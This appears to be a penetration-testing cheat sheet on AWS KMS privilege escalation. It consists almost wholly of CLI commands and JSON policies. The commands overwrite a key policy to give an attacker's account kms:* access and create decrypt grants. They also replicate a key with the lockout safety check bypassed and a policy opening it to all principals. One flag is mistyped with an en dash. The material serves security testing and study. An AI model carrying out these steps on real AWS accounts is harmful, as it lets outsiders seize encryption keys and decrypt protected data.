AWS - KMS Privesc

aws kms list-keys
aws kms list-key-policies --key-id <id> # Although only 1 max per key
aws kms get-key-policy --key-id <id> --policy-name <policy_name>
# AWS KMS keys can only have 1 policy, so you need to use the same name to overwrite the policy (the name is usually "default")
aws kms put-key-policy --key-id <id> --policy-name <policy_name> --policy file:///tmp/policy.json

{
    "Version" : "2012-10-17",
    "Id" : "key-consolepolicy-3",
    "Statement" : [ 
        {
            "Sid" : "Enable IAM User Permissions",
            "Effect" : "Allow",
            "Principal" : {
                "AWS" : "arn:aws:iam::<origin_account>:root"
            },
            "Action" : "kms:*",
            "Resource" : "*"
        }, 
        {
            "Sid" : "Allow all use",
            "Effect" : "Allow",
            "Principal" : {
                "AWS" : "arn:aws:iam::<attackers_account>:root"
            },
            "Action" : [ "kms:*" ],
            "Resource" : "*"
        }
    ]
}

aws kms create-grant \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    --grantee-principal arn:aws:iam::123456789012:user/exampleUser \
    --operations Decrypt

# Use the grant token in a request
aws kms generate-data-key \
    --key-id 1234abcd-12ab-34cd-56ef-1234567890ab \
    –-key-spec AES_256 \
    --grant-tokens $token

aws kms list-grants --key-id <value>

aws kms replicate-key --key-id mrk-c10357313a644d69b4b28b88523ef20c --replica-region eu-west-3 --bypass-policy-lockout-safety-check --policy file:///tmp/policy.yml

{
    "Version": "2012-10-17",
    "Id": "key-consolepolicy-3",
    "Statement": [
        {
            "Sid": "Enable IAM User Permissions",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": "kms:*",
            "Resource": "*"
        }
    ]
}